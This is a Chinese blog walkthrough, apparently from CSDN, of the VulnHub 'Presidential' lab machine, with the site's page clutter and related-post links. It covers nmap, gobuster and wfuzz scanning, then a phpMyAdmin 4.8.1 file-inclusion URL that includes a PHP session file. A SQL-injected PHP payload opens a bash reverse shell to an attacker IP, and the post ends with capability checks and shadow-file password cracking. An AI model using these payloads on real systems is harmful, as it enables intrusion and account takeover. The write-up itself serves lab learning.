vulnhub靶机Presidential

最新推荐文章于 2024-09-07 21:29:21 发布
最新推荐文章于 2024-09-07 21:29:21 发布
阅读量121 收藏
点赞数
分类专栏: vulnhub 文章标签: 网络安全 系统安全 网络攻击模型 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/134512462
版权

靶机地址:https://download.vulnhub.com/presidential/Presidential.ova

主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 192.168.21.150

端口服务扫描

nmap -sV -sT -O -p80 192.168.21.150

漏洞扫描

nmap --script=vuln -p80 192.168.21.150

只有一个端口

目录扫描

gobuster dir -u http://192.168.21.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

这个没用

换个工具扫一下

dirsearch -u "http://192.168.21.150/" -e *

这里面先去看config

好东西哦

这里只能扫到80端口

接下来就只能去找一下域名了

修改域名,再扫一遍

gobuster dir -u http://192.168.21.150/ -w SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

扫不出来,只剩下子域名爆破

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

改host访问

登入就行

好东西

这里先放着大概率不行的

版本

先去看看有没有洞

这个版本是4.8.1

啊这这个是winddows的

下一个应该就是linux的了

过程很清楚

这里需要包含cookie

jn284slhmdsjnbel58uruk855v80nbi1

包含session

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1(讲sess后面替换)

成功了,反弹shell(要登出一下,因为session会冲突只触发第一次的php命令)

select '<?php system("bash -i >& /dev/tcp/192.168.21.131/666 0>&1");exit;?>'

Session

挂监听

反弹成功

信息收集

getcap -r / 2>/dev/null

找查看开启capabilities的工具(capabilities资料:Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com)

有两个ping和tars个软件,去https://gtfobins.github.io/查一下

坏了没有提权的机会,去看一下权限的组了

???

小脑萎缩了

发现了一件事,进错用户了

去admin(root大概率进不去),想起来了admin这里要密码密码在数据库里面出现过

啊啊啊啊

暴力破解,建议用vim写进去,直接重定向会寄

Emmm各种花式大爆炸

去网上查了一下发现要影子文件还要passwd文件

我们拿到的其实是影子文件加密后的密码3

发现我有台机子就是不行

换了一台就好了(这就是传说中的水土不服?)

Passwd在前影子在后写进心得文件

登入admin

信息收集(应该大差不差)

还是一样的吧root用户的密码爆破出来

发现不行,看看使用ssh

Emm真有ssh之前没扫出来

确实有,还是要多扫即便

改权限(反弹shell我连不上就吧文件复制下来用攻击机连的)

ok

himobrinehacken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 951
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
Vulnhub靶机:Homeless
prettyX的博客
03-29 650
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/homeless-1,215/ 靶机安装环境:VMware 开始 1、靶机IP发现:192.168.1.111 //kali arp-scan -l 2、nmap 扫描,开放80、22端口 3、访问80,通过插件并未发现使用何种CMS 4、查看网页源码,果不其然,有提示,让仔细检...
vulnhub靶机:presidential1
weixin_52450702的博客
12-12 848
vulnhub靶机:presidential1
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1246
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 643
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8450
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Win10磁盘出现小锁和感叹号的解决办法
最新发布
java程序员的蜕变之路
09-07 133
速度比较慢,耐心等待会,每次查看状态加密的百分比都是减少哦。
安全检查报告模板
qq_48257021的博客
09-04 392
本报告旨在对公司的数据、系统安全、管理制度进行自查,并提出相应的整改方案。通过深入分析和评估,发现并解决潜在的安全风险和漏洞,提升公司的数据和系统安全性。
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1883
日薪1000+的护网行动开始招人了,有想法的速看!
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 323
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 1106
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 564
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
低代码平台中的统一认证与单点登录(SSO):实现简化与安全的用户管理
CC_longhua的博客
09-04 1264
低代码平台是一种允许用户通过图形化界面而非编写大量代码来构建应用程序的工具。这种平台的优势在于能够大幅度缩短开发周期、降低开发成本,并使得非技术人员也能参与到应用开发中。常见的低代码平台有OutSystems、Mendix、Appian等。统一认证是指通过一个中央系统进行用户身份验证的过程。用户只需在中央认证系统中进行一次身份验证,即可访问多个应用程序或服务。这种方式不仅提升了用户体验,还简化了后台的用户管理。对于有特殊需求的企业,低代码平台通常允许用户通过自定义代码来实现更复杂的认证逻辑。
API安全 | 发现API的5个小tips
2301_80115097的博客
09-05 835
安全测试目标时,最有趣的测试部分是它的 API。API 是动态的,它们比应用程序的其他部分更新得更频繁,并且负责许多后端繁重的工作。在现代应用程序中,我们通常会看到 REST API,但也会看到其他形式,例如 GraphQL 甚至 SOAP。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值